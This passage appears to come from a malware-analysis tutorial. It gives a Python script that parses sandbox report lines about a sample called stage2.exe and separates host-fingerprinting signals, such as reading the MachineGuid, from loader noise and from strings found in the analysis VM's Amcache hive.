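    r"Source: C:\Users\user\Desktop\stage2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior",
    r"Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr Binary or memory string: c:\users\user\desktop\procexp.exe",
    r"Source: Amcache.hve.26.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe",
    r"Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd",
]

LINK_RESIDUE = re.compile(r"\s*Jump to behavior$")   # interactive-page residue
VOLUME_RE = re.compile(r"^Source: (?P<src>.+?) Queries volume information: (?P<target>.+?) VolumeInformation$")
REGKEY_RE = re.compile(r"^Source: (?P<src>.+?) Key value queried: (?P<key>\S+) (?P<value>\S+)$")
STRING_RE = re.compile(r"^Source: (?P<src>.+?) Binary or memory string: (?P<text>.+)$")


def _process_name(src):
    return src.rsplit("\\", 1)[-1].lower()


def classify_volume_target(path, sample_name):
    """Heuristic buckets (this example's assumption, not a report category)."""
    p = path.lower()
    if re.fullmatch(r"[a-z]:\\?", p):
        return "volume_root"          # whole-volume serial: classic host-ID input
    if p.endswith("\\" + sample_name.lower()):
        return "sample_image"         # the sample asking about its own location
    if "\\microsoft.net\\assembly\\gac" in p:
        return "gac_assembly"         # CLR assembly binding; expected in any .NET process
    if "\\system32\\catroot\\" in p:
        return "signature_catalog"    # Authenticode catalog lookups during module load
    return "other"


def evidence_origins(src_field):
    """Where a 'Binary or memory string' hit came from: '.dr' marks a file
    written during analysis, '.sdmp' a memory dump of the sample process."""
    origins = set()
    for tok in (t.strip().lower() for t in src_field.split(",")):
        if tok.endswith(".dr"):
            origins.add("analysis_vm_hive" if "amcache.hve" in tok else "dropped_file")
        elif tok.endswith(".sdmp"):
            origins.add("memory_dump")
        else:
            origins.add("sample_image")
    return origins


def triage(lines, sample_name="stage2.exe"):
    volume = defaultdict(lambda: defaultdict(set))   # process -> bucket -> unique targets
    registry, strings = [], []
    for raw in lines:
        line = LINK_RESIDUE.sub("", raw.strip())
        if m := VOLUME_RE.match(line):
            bucket = classify_volume_target(m["target"], sample_name)
            volume[_process_name(m["src"])][bucket].add(m["target"])
        elif m := REGKEY_RE.match(line):
            registry.append({"process": _process_name(m["src"]), "key": m["key"],
                             "value": m["value"],
                             "fingerprint": m["value"].lower() == "machineguid"})
        elif m := STRING_RE.match(line):
            origins = evidence_origins(m["src"])
            strings.append({"text": m["text"], "origins": sorted(origins),
                            "from_sample": bool(origins & {"sample_image", "memory_dump"})})
    return {
        "volume": {proc: {b: sorted(paths) for b, paths in buckets.items()}
                   for proc, buckets in volume.items()},
        "registry": registry,
        "strings": strings,
    }


def fingerprint_signals(summary):
    """The entries a reviewer should actually look at, as (process, kind, target)."""
    signals = []
    for proc, buckets in summary["volume"].items():
        for bucket in ("sample_image", "volume_root"):
            signals.extend((proc, bucket, p) for p in buckets.get(bucket, []))
    for r in summary["registry"]:
        if r["fingerprint"]:
            signals.append((r["process"], "machine_guid", r["key"] + "\\" + r["value"]))
    return signals


if __name__ == "__main__":
    s = triage(REPORT_LINES)
    for sig in fingerprint_signals(s):
        print("fingerprint candidate:", *sig)
    for hit in s["strings"]:
        print("string", repr(hit["text"]), "origins", hit["origins"], "from sample:", hit["from_sample"])
```

Run against the constructed lines, the three fingerprint candidates are stage2.exe probing its own image, powershell.exe probing C:\ and the MachineGuid read; the two GAC and catalog entries are bucketed as loader noise, and the procexp.exe and msmpeng.exe hits are marked as coming from the analysis VM's Amcache hive, not from the sample. Feed the full report section in place of REPORT_LINES to apply the same split to every entry.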